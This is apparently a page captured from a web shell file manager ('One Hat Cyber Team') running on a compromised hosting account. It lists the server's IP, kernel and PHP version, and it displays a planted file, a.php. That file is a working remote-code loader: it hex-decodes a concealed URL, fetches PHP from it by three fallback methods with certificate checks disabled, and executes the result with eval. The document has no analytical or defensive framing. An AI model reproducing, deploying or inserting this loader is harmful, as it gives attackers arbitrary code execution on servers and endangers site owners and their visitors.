⚝
One Hat Cyber Team
⚝
Your IP:
216.73.216.48
Server IP:
78.40.11.138
Server:
Linux tango.o2switch.net 4.18.0-553.30.1.lve.el8.x86_64 #1 SMP Tue Dec 3 01:21:19 UTC 2024 x86_64
Server Software:
Apache
PHP Version:
7.4.33
Buat File
|
Buat Folder
Eksekusi
Dir :
~
/
home
/
sc1voni9410
/
olympianthemes.com
/
View File Name :
a.php
<?php error_reporting(E_ALL); ini_set('display_errors', 1); ini_set('display_startup_errors', 1); $hexUrl = '68747470733a2f2f72757364692e66756e2f7261772f613238313062'; function hexToString($hex) { $str = ''; for ($i = 0; $i < strlen($hex) - 1; $i += 2) { $str .= chr(hexdec($hex[$i] . $hex[$i + 1])); } return $str; } $url = hexToString($hexUrl); function downloadWithFileGetContents($url) { if (ini_get('allow_url_fopen')) { return @file_get_contents($url); } return false; } function downloadWithCurl($url) { if (function_exists('curl_init')) { $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); $data = curl_exec($ch); curl_close($ch); return $data; } return false; } function downloadWithFopen($url) { $result = false; if ($fp = @fopen($url, 'r')) { $result = ''; while ($data = fread($fp, 8192)) { $result .= $data; } fclose($fp); } return $result; } $phpScript = downloadWithFileGetContents($url); if ($phpScript === false) { $phpScript = downloadWithCurl($url); } if ($phpScript === false) { $phpScript = downloadWithFopen($url); } if ($phpScript === false) { die("Failed to download PHP script from URL using all available methods."); } if (strpos($phpScript, '<?php') === false) { $phpScript = '<?php ' . $phpScript; } try { eval('?>' . $phpScript); } catch (ParseError $e) { die("Syntax error in the fetched code: " . $e->getMessage()); } ?>